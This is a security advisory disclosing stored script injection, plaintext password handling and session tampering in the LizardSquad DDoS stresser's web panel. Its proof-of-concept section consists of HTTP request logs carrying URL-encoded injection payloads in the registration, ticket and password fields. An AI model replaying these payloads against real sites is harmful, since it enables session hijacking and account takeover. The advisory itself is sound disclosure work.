Document Title: =============== LizardSquad DDoS Stresser - Multiple Vulnerabilities References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1417 http://magazine.vulnerability-db.com/?q=articles/2015/01/20/lizardsquad-ddos-stresser-multiple-vulnerabilities-revealed-takeover-ddos# Release Date: ============= 2015-01-20 Vulnerability Laboratory ID (VL-ID): ==================================== 1417 Common Vulnerability Scoring System: ==================================== 8.9 Product & Service Introduction: =============================== The product, called Lizard Stresser is a stress tester that might let you see how your own network stands up to DDoS attacks, like the ones that interrupted the gaming networks for several days last week. DDoS attacks basically overload servers with massive amounts of bogus requests. (Copy of the Homepage: https://lizardstresser.su/ ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official LizardSquad DDoS Stresser online-service web-application. Vulnerability Disclosure Timeline: ================================== 2015-01-20: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== LizardSquad Product: DDoS Stresser - Web Application (Online-Service) 2015 Q1 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ Multiple web vulnerabilities has been discovered in the official LizardSquad `Stresser DDoS Service` web-application. 1.1 The 1st vulnerability is located in `username` value of the registration module. A user can register a script code as payload to the name values. The ddos web-service of the input on registration uses the wrong conditions to encode and parse. Thus allows to execute the injected script code in the `./ref` module of the service. The request method to inject is POST and the vulnerability is located on the application-side of the ddos stresser service. The main administrators are able to see the user passwords, by watching the logs of an compromised server you see that they can switch by login in through the registered user accounts. This is possible because of plain transfered passwords in the ddos application. The known event can be used to prepare malicious code that executes function in connection with application-side injected script codes. The vulnerable file to inject the code is the register.php file. Another execution of the injected script code occurs in the main dashboard (left sidebar) were the username is getting visible. Vulnerable Module(s): [+] Registration (./ref) Vulnerable Parameter(s): [+] username Affected Module(s): [+] Dashboard (Username in Left Sidebar) 1.2 The 2nd vulnerability is located in the Ticket Title & Ticket Content input fields of the `Tickets` (tickets) module. A fresh registered user account is able to inject own malicious persistent script code to the ticket input fields to exploit a backend administrator account. After an attacker registers and inject own script code to the ticket system he is able to get the ip of the backend users or can compromise the session data of moderators/administrators. The inject occurs in the `./tickets` module. The execution takes place locally in the listed open ticket items of the backend. Remote attackers are also able to access other tickets and stored information by intercepting the session of the add Ticket POST method request. Vulnerable Module(s): [+] Tickets (./tickets) Vulnerable Parameter(s): [+] name (servername) 1.3 The 3rd vulnerability is located in the target server `name` value. The attacker uses the device or servername to send malicious data to the ddos application control panel. A remote attacker can change the server or device name value to a script code payload that executes in the panel (server target list). The service syncs the the device/server name value after the infection but also if the attacker syncs the data manually. In case of usage macOS to attack it is possible to change the servername easily to a malicious script code payload that affects the ddos control panel. Vulnerable Module(s): [+] server list Vulnerable Parameter(s): [+] name (servername) 1.4 The 4th vulnerability is located in the `dasboard > user settings > change password` module. The data in the POST method to change the own account password is send in plain-text. Thus allows remote attackers and network administors to capture compromised accounts. The service can also be observed by man-in-the-middle attacks in the local network. Vulnerable Module(s): [+] dasboard > user settings > change password 1.5 The 5th vulnerability is also located in the `dasboard > user settings > change password` module. The POST method request of the change function in the ddos application can be intercepted by attackers to compromise the service. The remote attacker logs in as user and intercepts the session information by changing to an existing user account. Successul exploitation of the session tampering issues results in account system compromise (administrators/customers). Vulnerable Module(s): [+] dasboard > user settings > change password Vulnerable Parameter(s): [+] id Proof of Concept (PoC): ======================= 1.1 --- PoC Session Logs [POST] (Injection) --- Status: 200[OK] POST http://lizardstresser.su/usercp Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] Request Header: Host[lizardstresser.su] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer [http://lizardstresser.su/usercp] Cookie[__cfduid=dede840b76815fd52769922600b1e086c1421749609; PHPSESSID=f4i5t8vhqgscb0adhtkqlcvv01] Connection[keep-alive] POST-Daten: cpassword[chaos666] npassword[http%3A%2F %2Flizardstresser.su%2F%3Fr%3Dimgsrcx2020iframesrca20iframe] rpassword[http%3A%2F%2Flizardstresser.su%2F%3Fr%3Dimgsrcx2020iframesrca20iframe] updatePassBtn[Change+Stored+Data%21] Response Header: Date[Tue, 20 Jan 2015 10:29:21 GMT] Content-Type[text/html] Transfer-Encoding[chunked] Connection[keep-alive] Expires[Thu, 19 Nov 1981 08:52:00 GMT] Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0] Pragma[no-cache] Server[cloudflare-nginx] CF-RAY[1aba972a06dd15b3-FRA] Content-Encoding[gzip] - Status: 302[Moved Temporarily] POST https://lizardstresser.su/register.php Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] Request Header: Host[lizardstresser.su] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://lizardstresser.su/register.php] Cookie[__cfduid=dede840b76815fd52769922600b1e086c1421749609; PHPSESSID=f4i5t8vhqgscb0adhtkqlcvv01] Connection[keep-alive] POST-Daten: username[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E2] password[chaos666] rpassword[chaos666] email[research%40vulnerbaility-lab.com] ref[%2F] checkbox1[1] register[Register] Response Header: Server[cloudflare-nginx] Date[Tue, 20 Jan 2015 11:20:02 GMT] Content-Type[text/html] Expires[Thu, 19 Nov 1981 08:52:00 GMT] Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0] Pragma[no-cache] Location[/purchase] CF-RAY[1abae168238f15b3-FRA] X-Firefox-Spdy[3.1] Reference(s): http://lizardstresser.su/?r=imgsrcx2020iframesrca20iframe https://lizardstresser.su/register.php 1.2 --- PoC Session Logs [POST] (Injection) --- Status: 200[OK] POST http://lizardstresser.su/ajax/addticket.php Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[-1] Mime Type[text/html] Request Header: Host[lizardstresser.su] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0] Accept[*/*] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Content-Type[application/x-www-form-urlencoded; charset=UTF-8] X-Requested-With[XMLHttpRequest] Referer[http://lizardstresser.su/tickets] Content-Length[324] Cookie[__cfduid=dede840b76815fd52769922600b1e086c1421749609; PHPSESSID=f4i5t8vhqgscb0adhtkqlcvv01] Connection[keep-alive] Pragma[no-cache] Cache-Control[no-cache] POST-Daten: title2[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E] code[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E] content[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E] hash[JMX02SbuIwklRiGPAVDgeOC5nTs41xFp] Response Header: Date[Tue, 20 Jan 2015 10:30:54 GMT] Content-Type[text/html] Transfer-Encoding[chunked] Connection[keep-alive] Expires[Thu, 19 Nov 1981 08:52:00 GMT] Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0] Pragma[no-cache] Server[cloudflare-nginx] CF-RAY[1aba996d3d7115b3-FRA] Content-Encoding[gzip] Reference(s): http://lizardstresser.su/ajax/addticket.php Credits & Authors: ================== Vulnerability Laboratory [Research Team] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt